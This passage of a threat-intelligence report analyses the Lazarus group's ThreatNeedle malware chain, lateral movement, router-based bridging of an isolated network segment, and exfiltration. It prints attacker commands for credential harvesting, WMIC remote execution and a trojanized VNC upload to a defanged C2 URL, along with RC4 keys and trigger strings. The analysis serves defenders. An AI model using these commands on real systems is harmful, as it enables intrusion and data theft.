Although the malware involved and the entire infection process are known and have not changed dramatically compared to previous findings, the Lazarus group continued using ThreatNeedle malware aggressively in this campaign.</p> <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145116/lazarus_threatneedle_07.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-100815" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145116/lazarus_threatneedle_07.png" alt="Infection procedure" width="1504" height="514" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145116/lazarus_threatneedle_07.png 1504w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145116/lazarus_threatneedle_07-300x103.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145116/lazarus_threatneedle_07-1024x350.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145116/lazarus_threatneedle_07-768x262.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145116/lazarus_threatneedle_07-512x175.png 512w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145116/lazarus_threatneedle_07-370x126.png 370w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145116/lazarus_threatneedle_07-819x280.png 819w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145116/lazarus_threatneedle_07-800x273.png 800w" sizes="auto, (max-width: 1504px) 100vw, 1504px" /></a></p> <p style="text-align: center"><strong><em>Infection procedure</em></strong></p> <p>The payload created by the initial spear-phishing document loads the next stage as a backdoor running in-memory – the ThreatNeedle backdoor. ThreatNeedle offers functionality to control infected victims. 
The actor uses it to carry out initial reconnaissance and deploy additional malware for lateral movement. When moving laterally, the actor uses ThreatNeedle installer-type malware. This installer is responsible for implanting the next-stage loader-type malware and registering it for auto-execution in order to achieve persistence. The ThreatNeedle loader-type malware exists in several variations and serves the primary purpose of loading the final stage of the ThreatNeedle malware in memory.</p> <h3 id="threatneedle-installer">ThreatNeedle installer</h3> <p>Upon launch, the malware decrypts an embedded string using RC4 (key: B6 B7 2D 8C 6B 5F 14 DF B1 38 A1 73 89 C1 D2 C4) and compares it to “<em>7486513879852</em>”. If the user executes this malware without a command line parameter, the malware launches a legitimate calculator carrying a dark icon of the popular Avengers franchise.</p> <p>Further into the infection process, the malware randomly chooses a service name from netsvc in order to use it for the payload creation path. The malware then creates a file named bcdbootinfo.tlp in the system folder containing the infection time and the randomly chosen service name. We’ve discovered that the malware operator checks this file to see whether the remote host was infected and, if so, when the infection happened; the same file therefore serves as a useful infection marker when triaging a host.</p> <p>It then decrypts the embedded payload using the RC4 algorithm, saves it in the current directory as a file with a randomly generated five-character name and an .xml extension, and then copies it to the system folder with a .sys extension.</p> <p>This final payload is the ThreatNeedle loader running in memory. At this point the loader uses a different RC4 key (3D 68 D0 0A B1 0E C6 AF DD EE 18 8E F4 A1 D6 20), and the dropped malware is registered as a Windows service and launched. 
In addition, the malware saves its configuration data, encrypted with RC4, under the following registry key:</p> <ul> <li>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\GameConfig – Description</li> </ul> <h3 id="threatneedle-loader">ThreatNeedle loader</h3> <p>This component is responsible for loading the final backdoor payload into memory. In order to do this, the malware uses several techniques to obtain and decrypt its payload:</p> <ul> <li>Loading the payload from the registry.</li> <li>Loading the payload from itself after RC4 decryption and decompression.</li> <li>Loading the payload from itself after AES decryption and decompression.</li> <li>Loading the payload from itself after decompression.</li> <li>Loading the payload from itself after one-byte XORing.</li> </ul> <p>Most loader-style malware types check the command line parameter and only proceed with the malicious routine if an expected parameter is given. This is a common trait in ThreatNeedle loaders. The most common example we’ve seen is similar to the ThreatNeedle installer – upon launch, the malware decrypts an embedded string using RC4 and compares it with the parameter “Sx6BrUk4v4rqBFBV”. If it matches, the malware begins decrypting its embedded payload using the same RC4 key. The decrypted payload is an archive file, which is subsequently decompressed in the process. Eventually, the ThreatNeedle malware spawns in memory.</p> <p>The other variant of the loader prepares the next-stage payload from the victim’s registry. Based on the installer description above, we suspect that the registry key was created by the installer component. The data retrieved from the registry is decrypted using RC4 and then decompressed. Eventually, it gets loaded into memory and its export function is invoked.</p> <h3 id="threatneedle-backdoor">ThreatNeedle backdoor</h3> <p>The final payload executed in memory is the actual ThreatNeedle backdoor. 
It has the following functionality to control infected victim machines:</p> <ul> <li>Manipulate files/directories</li> <li>Profile the system</li> <li>Control backdoor processes</li> <li>Enter sleep or hibernation mode</li> <li>Update the backdoor configuration</li> <li>Execute received commands</li> </ul> <h2 id="post-exploitation-phase">Post-exploitation phase</h2> <p>On one of the hosts, we discovered that the actor executed a credential harvesting tool named <a href="https://github.com/lgandx/Responder/">Responder</a> and moved laterally using Windows commands. Lazarus overcame network segmentation, exfiltrating data from a completely isolated network segment cut off from the internet by compromising a router virtual machine, as we explain below under <em>“Overcoming network segmentation”</em>.</p> <p>Judging by the hosts that were infected with the ThreatNeedle backdoors post-exploitation, we speculate that the primary intention of this attack was to steal intellectual property. Lastly, the stolen data gets exfiltrated using a custom tool that will be described in the “<em>Exfiltration</em>” section. 
Below is a rough timeline of the compromise we investigated:</p> <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145219/lazarus_threatneedle_08.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-100816" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145219/lazarus_threatneedle_08.png" alt="" width="1600" height="856" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145219/lazarus_threatneedle_08.png 1600w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145219/lazarus_threatneedle_08-300x161.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145219/lazarus_threatneedle_08-1024x548.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145219/lazarus_threatneedle_08-768x411.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145219/lazarus_threatneedle_08-1536x822.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145219/lazarus_threatneedle_08-327x175.png 327w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145219/lazarus_threatneedle_08-370x198.png 370w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145219/lazarus_threatneedle_08-523x280.png 523w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145219/lazarus_threatneedle_08-800x428.png 800w" sizes="auto, (max-width: 1600px) 100vw, 1600px" /></a></p> <p style="text-align: center"><strong><em>Timeline of infected hosts</em></strong></p> <h3 id="credential-gathering">Credential gathering</h3> <p>During the investigation we discovered that the Responder tool was executed from one of the victim machines that had received the spear-phishing document. 
One day after the initial infection, the malware operator placed the tool onto this host and executed it using the following command:</p> <ul> <li>[Responder file path] -i [IP address] -rPv</li> </ul> <p>Several days later, the attacker started to move laterally originating from this host. Therefore, we assess that the attacker succeeded in acquiring login credentials from this host and started using them for further malicious activity.</p> <h3 id="lateral-movement">Lateral movement</h3> <p>After acquiring the login credentials, the actor started to move laterally from workstations to server hosts. Typical lateral movement methods were employed, using Windows commands. First, a network connection with a remote host was established using the command “net use”.</p> <ul> <li>net use \\<em>[IP address]</em>\IPC$ “<em>[password]</em>” /u:”[user name]” > $temp\~tmp5936t.tmp 2>&1″</li> </ul> <p>Next, the actor copied malware to the remote host using the Windows Management Instrumentation Command-line (WMIC).</p> <ul> <li>exe /node:[IP address] /user:”[user name]” /password:”[password]” PROCESS CALL CREATE “<strong>cmd.exe /c $appdata\Adobe\adobe.bat</strong>“</li> <li>exe /node:[IP address] /user:”[user name]” /password:”[password]” PROCESS CALL CREATE “<strong>cmd /c sc queryex helpsvc > $temp\tmp001.dat</strong>“</li> </ul> <h3 id="overcoming-network-segmentation">Overcoming network segmentation</h3> <p>In the course of this research, we identified another highly interesting technique used by the attackers for lateral movement and exfiltration of stolen data. The enterprise network under attack was divided into two segments: corporate (a network on which computers had internet access) and restricted (a network on which computers hosted sensitive data and had no internet access). According to corporate policies, no transfer of information was allowed between these two segments. 
In other words, the two segments were meant to be completely separated.</p> <p>Initially, the attackers were able to get access to systems with internet access and spent a long time distributing malware between machines in the network’s corporate segment. Among the compromised machines were those used by the administrators of the enterprise’s IT infrastructure.</p> <p>It is worth noting that the administrators could connect both to the corporate and the restricted network segments to maintain systems and provide users with technical support in both zones. As a result, by gaining control of administrator workstations the attackers were able to access the restricted network segment.</p> <p>However, since directly routing traffic between the segments was not possible, the attackers couldn’t use their standard malware set to exfiltrate data from the restricted segment to the C2.</p> <p>The situation changed on July 2 when the attackers managed to obtain the credentials for the router used by the administrators to connect to systems in both segments. 
The router was a virtual machine running CentOS to route traffic between several network interfaces based on predefined rules.</p> <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24163703/lazarus_threatneedle_09.png" class="magnificImage"><img loading="lazy" decoding="async" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24163703/lazarus_threatneedle_09-1024x406.png" alt="" width="1024" height="406" class="aligncenter size-large wp-image-100975" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24163703/lazarus_threatneedle_09-1024x406.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24163703/lazarus_threatneedle_09-300x119.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24163703/lazarus_threatneedle_09-768x305.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24163703/lazarus_threatneedle_09-441x175.png 441w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24163703/lazarus_threatneedle_09-370x147.png 370w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24163703/lazarus_threatneedle_09-706x280.png 706w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24163703/lazarus_threatneedle_09-800x317.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24163703/lazarus_threatneedle_09.png 1270w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></a></p> <p style="text-align: center"><strong><em>Connection layout between victim’s network segments</em></strong></p> <p>According to the evidence collected, the attackers scanned the router’s ports and detected a <a href="https://www.webmin.com/">Webmin</a> interface. Next, the attackers logged in to the web interface using a privileged root account. 
It’s unknown how the attackers were able to obtain the credentials for that account, but it’s possible the credentials were saved in one of the infected system’s browser password managers.</p> <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145349/lazarus_threatneedle_10.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-100818" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145349/lazarus_threatneedle_10.png" alt="" width="1404" height="245" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145349/lazarus_threatneedle_10.png 1404w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145349/lazarus_threatneedle_10-300x52.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145349/lazarus_threatneedle_10-1024x179.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145349/lazarus_threatneedle_10-768x134.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145349/lazarus_threatneedle_10-1003x175.png 1003w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145349/lazarus_threatneedle_10-370x65.png 370w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145349/lazarus_threatneedle_10-800x140.png 800w" sizes="auto, (max-width: 1404px) 100vw, 1404px" /></a></p> <p style="text-align: center"><strong><em>Log listing Webmin web interface logins</em></strong></p> <p>By gaining access to the configuration panel the attackers configured the Apache web server and started using the router as a proxy server between the organization’s corporate and restricted segments.</p> <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145420/lazarus_threatneedle_11.png" class="magnificImage"><img loading="lazy" decoding="async" 
class="aligncenter size-full wp-image-100819" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145420/lazarus_threatneedle_11.png" alt="" width="868" height="260" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145420/lazarus_threatneedle_11.png 868w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145420/lazarus_threatneedle_11-300x90.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145420/lazarus_threatneedle_11-768x230.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145420/lazarus_threatneedle_11-584x175.png 584w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145420/lazarus_threatneedle_11-370x111.png 370w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145420/lazarus_threatneedle_11-800x240.png 800w" sizes="auto, (max-width: 868px) 100vw, 868px" /></a></p> <p style="text-align: center"><strong><em>List of services used on the router</em></strong></p> <p>Several days after that, on July 10, 2020, the attackers connected to the router via SSH and set up the PuTTy <a href="https://www.ssh.com/ssh/putty/putty-manuals/0.68/Chapter5.html">PSCP</a> (the PuTTY Secure Copy client) utility on one of the infected machines. This utility was used to upload malware to the router VM. This enabled the attackers to place malware onto systems in the restricted segment of the enterprise network, using the router to host the samples. 
In addition, malware running in the network’s restricted segment was able to exfiltrate the collected data to the command-and-control server via the Apache server set up on the same router.</p> <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24164015/lazarus_threatneedle_12.png" class="magnificImage"><img loading="lazy" decoding="async" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24164015/lazarus_threatneedle_12-1024x443.png" alt="" width="1024" height="443" class="aligncenter size-large wp-image-100977" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24164015/lazarus_threatneedle_12-1024x443.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24164015/lazarus_threatneedle_12-300x130.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24164015/lazarus_threatneedle_12-768x332.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24164015/lazarus_threatneedle_12-404x175.png 404w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24164015/lazarus_threatneedle_12-370x160.png 370w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24164015/lazarus_threatneedle_12-647x280.png 647w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24164015/lazarus_threatneedle_12-800x346.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24164015/lazarus_threatneedle_12.png 1289w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></a></p> <p style="text-align: center"><strong><em>New connection layout after attacker’s intrusion</em></strong></p> <p>In the course of the investigation we identified malware samples with the hardcoded URL of the router used as a proxy server.</p> <p><a 
href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145453/lazarus_threatneedle_13.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-100820" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145453/lazarus_threatneedle_13.png" alt="" width="1031" height="87" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145453/lazarus_threatneedle_13.png 1031w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145453/lazarus_threatneedle_13-300x25.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145453/lazarus_threatneedle_13-1024x86.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145453/lazarus_threatneedle_13-768x65.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145453/lazarus_threatneedle_13-370x31.png 370w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145453/lazarus_threatneedle_13-800x68.png 800w" sizes="auto, (max-width: 1031px) 100vw, 1031px" /></a></p> <p style="text-align: center"><strong><em>Hardcoded proxy address in the malware</em></strong></p> <p>Since the attackers regularly deleted log files from the router, only a handful of commands entered to the command line via SSH could be recovered. 
An analysis of these commands shows that the attackers tried to reconfigure traffic routing using the route command.</p> <p style="text-align: center"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145548/lazarus_threatneedle_14.png" class="magnificImage"><img loading="lazy" decoding="async" style="text-align: center" class="size-full wp-image-100822 aligncenter" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145548/lazarus_threatneedle_14.png" alt="" width="499" height="156" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145548/lazarus_threatneedle_14.png 499w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145548/lazarus_threatneedle_14-300x94.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145548/lazarus_threatneedle_14-370x116.png 370w" sizes="auto, (max-width: 499px) 100vw, 499px" /></a></p> <p style="text-align: center"><strong><em>Attacker commands</em></strong></p> <p>The attackers also ran the nmap utility on the router VM and scanned ports on systems within the restricted segment of the enterprise network. 
On September 27, the attackers started removing all traces of their activity from the router, using the logrotate utility to set up automatic deletion of log files.</p> <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145608/lazarus_threatneedle_15.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-100823" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145608/lazarus_threatneedle_15.png" alt="" width="918" height="99" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145608/lazarus_threatneedle_15.png 918w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145608/lazarus_threatneedle_15-300x32.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145608/lazarus_threatneedle_15-768x83.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145608/lazarus_threatneedle_15-370x40.png 370w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145608/lazarus_threatneedle_15-800x86.png 800w" sizes="auto, (max-width: 918px) 100vw, 918px" /></a></p> <p style="text-align: center"><strong><em>Webmin log</em></strong></p> <h3 id="exfiltration">Exfiltration</h3> <p>We observed that the malware operator attempted to create SSH tunnels to a remote server located in South Korea from several compromised server hosts. They used a custom tunneling tool to achieve this. The tool receives four parameters: client IP address, client port, server IP address and server port. The tool offers basic functionality, forwarding client traffic to the server. 
In order to create a covert channel, the malware encrypts forwarded traffic using trivial binary encryption.</p> <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145640/lazarus_threatneedle_16.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-100824" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145640/lazarus_threatneedle_16.png" alt="" width="920" height="316" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145640/lazarus_threatneedle_16.png 920w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145640/lazarus_threatneedle_16-300x103.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145640/lazarus_threatneedle_16-768x264.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145640/lazarus_threatneedle_16-509x175.png 509w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145640/lazarus_threatneedle_16-370x127.png 370w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145640/lazarus_threatneedle_16-815x280.png 815w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145640/lazarus_threatneedle_16-800x275.png 800w" sizes="auto, (max-width: 920px) 100vw, 920px" /></a></p> <p style="text-align: center"><strong><em>Encryption routine</em></strong></p> <p>Using the covert channel, the adversary copied data from the remote server over to the host using the PuTTy PSCP tool:</p> <ul> <li>%APPDATA%\PBL\unpack.tmp -pw <em>[password]</em> root@<em>[IP address]</em>:/tmp/cab0215 %APPDATA%\PBL\cab0215.tmp</li> </ul> <p>After copying data from the server, the actor utilized the custom tool to exfiltrate stolen data to the remote server. 
This malware looks like a legitimate VNC client and runs like one if it’s executed without any command line parameters.</p> <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145717/lazarus_threatneedle_17.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-100825" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145717/lazarus_threatneedle_17.png" alt="" width="924" height="664" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145717/lazarus_threatneedle_17.png 924w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145717/lazarus_threatneedle_17-300x216.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145717/lazarus_threatneedle_17-768x552.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145717/lazarus_threatneedle_17-244x175.png 244w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145717/lazarus_threatneedle_17-370x266.png 370w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145717/lazarus_threatneedle_17-390x280.png 390w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145717/lazarus_threatneedle_17-800x575.png 800w" sizes="auto, (max-width: 924px) 100vw, 924px" /></a></p> <p style="text-align: center"><strong><em>Execution of malware without parameters</em></strong></p> <p>However, if this application is executed with specific command line parameters, it runs an alternate, malicious function. 
According to our telemetry, the actor executed this application with six parameters:</p> <ul> <li><em>%APPDATA%\Comms\Comms.dat S0RMM-50QQE-F65DN-DCPYN-5QEQA hxxps://www.gonnelli[.]it/uploads/catalogo/thumbs/thumb[.]asp %APPDATA%\Comms\cab59.tmp FL0509 15000</em></li> </ul> <p>Also, if the number of command line parameters is greater than six, the malware jumps into a malicious routine. The malware also checks the length of the second argument – if it’s less than 29 characters, it terminates. Once the parameter checks have passed, the malware starts to decrypt its next payload.</p> <p>The embedded payload gets decrypted via XOR, where each byte from the end of the payload gets applied to the preceding byte. Next, the XORed blob receives the second command line argument that’s provided (in this case S0RMM-50QQE-F65DN-DCPYN-5QEQA). The malware can accept more command line arguments, and depending on their number it runs differently. For example, it can also receive proxy server addresses with the “-p” option.</p> <p>When the decrypted in-memory payload is executed, it compares the header of the configuration data passed to it with the string “0x8406” in order to confirm its validity. The payload opens a given file (in this example %APPDATA%\Comms\cab59.tmp) and starts exfiltrating it to the remote server. 
When the malware uploads data to the C2 server, it uses HTTP POST requests with two parameters named ‘fr’ and ‘fp’:</p> <ul> <li>The ‘fr’ parameter contains the file name from the command line argument to upload.</li> <li>The ‘fp’ parameter contains the base64 encoded size, CRC32 value of content and file contents.</li> </ul> <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145751/lazarus_threatneedle_18.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-100826" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145751/lazarus_threatneedle_18.png" alt="" width="1558" height="131" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145751/lazarus_threatneedle_18.png 1558w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145751/lazarus_threatneedle_18-300x25.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145751/lazarus_threatneedle_18-1024x86.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145751/lazarus_threatneedle_18-768x65.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145751/lazarus_threatneedle_18-1536x129.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145751/lazarus_threatneedle_18-1030x87.png 1030w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145751/lazarus_threatneedle_18-370x31.png 370w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145751/lazarus_threatneedle_18-800x67.png 800w" sizes="auto, (max-width: 1558px) 100vw, 1558px" /></a></p> <p style="text-align: center"><strong><em>Contents of fp parameter</em></strong></p> <h2 id="attribution">Attribution</h2> <p>We have been tracking ThreatNeedle malware for more than two years and are highly confident that this 
malware cluster is attributed only to the Lazarus group. During this investigation, we were able to find connections to several clusters of the Lazarus group.</p> <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145822/lazarus_threatneedle_19.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-100827" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145822/lazarus_threatneedle_19.png" alt="" width="1474" height="884" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145822/lazarus_threatneedle_19.png 1474w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145822/lazarus_threatneedle_19-300x180.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145822/lazarus_threatneedle_19-1024x614.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145822/lazarus_threatneedle_19-768x461.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145822/lazarus_threatneedle_19-292x175.png 292w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145822/lazarus_threatneedle_19-370x222.png 370w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145822/lazarus_threatneedle_19-467x280.png 467w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145822/lazarus_threatneedle_19-800x480.png 800w" sizes="auto, (max-width: 1474px) 100vw, 1474px" /></a></p> <p style="text-align: center"><strong><em>Connections between Lazarus campaigns</em></strong></p> <h3 id="connection-with-deathnote-cluster">Connection with DeathNote cluster</h3> <p>During this investigation we identified several connections with the DeathNote (a.k.a. <a href="https://www.clearskysec.com/operation-dream-job/">Operation Dream Job</a>) cluster of the Lazarus group. 
First of all, among the hosts infected by the ThreatNeedle malware, we discovered one that was also infected with the DeathNote malware, and both threats used the same C2 server URLs.</p> <p>In addition, while analyzing the C2 server used in this attack, we found a custom web shell script that was also discovered on the DeathNote C2 server. We also identified that the server script corresponding to the <em>Trojanized VNC Uploader</em> was found on the DeathNote C2 server.</p> <p>Although DeathNote and this incident show different TTPs, both campaigns share command and control infrastructure and some victimology.</p> <h3 id="connection-with-operation-applejeus">Connection with Operation AppleJeus</h3> <p>We also found a connection with <a href="https://securelist.com/operation-applejeus/87553/">Operation AppleJeus</a>. As we described, the actor used a homemade tunneling tool in the ThreatNeedle campaign that has a custom encryption routine to create a covert channel. This very same tool was utilized in operation AppleJeus as well.</p> <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145858/lazarus_threatneedle_20.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-100828" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145858/lazarus_threatneedle_20.png" alt="" width="1774" height="348" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145858/lazarus_threatneedle_20.png 1774w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145858/lazarus_threatneedle_20-300x59.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145858/lazarus_threatneedle_20-1024x201.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145858/lazarus_threatneedle_20-768x151.png 768w, 
https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145858/lazarus_threatneedle_20-1536x301.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145858/lazarus_threatneedle_20-892x175.png 892w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145858/lazarus_threatneedle_20-370x73.png 370w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145858/lazarus_threatneedle_20-1427x280.png 1427w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145858/lazarus_threatneedle_20-800x157.png 800w" sizes="auto, (max-width: 1774px) 100vw, 1774px" /></a></p> <p style="text-align: center"><strong><em>Same tunneling tool</em></strong></p> <h3 id="connection-with-bookcode-cluster">Connection with Bookcode cluster</h3> <p>In our previous <a href="https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/">blog post</a> about the Lazarus group, we mentioned the Bookcode cluster, which is attributed to Lazarus; recently, the Korea Internet and Security Agency (KISA) also <a href="https://www.krcert.or.kr/data/reportView.do?bulletin_writing_sequence=35471">published</a> a report about the operation. In that report, they mentioned a malware cluster named LPEClient, used for profiling hosts and fetching next-stage payloads. While investigating this incident, we also found LPEClient on the host infected with ThreatNeedle. We therefore assess that the ThreatNeedle cluster is connected to the Bookcode operation.</p> <h2 id="conclusions">Conclusions</h2> <p>In recent years, 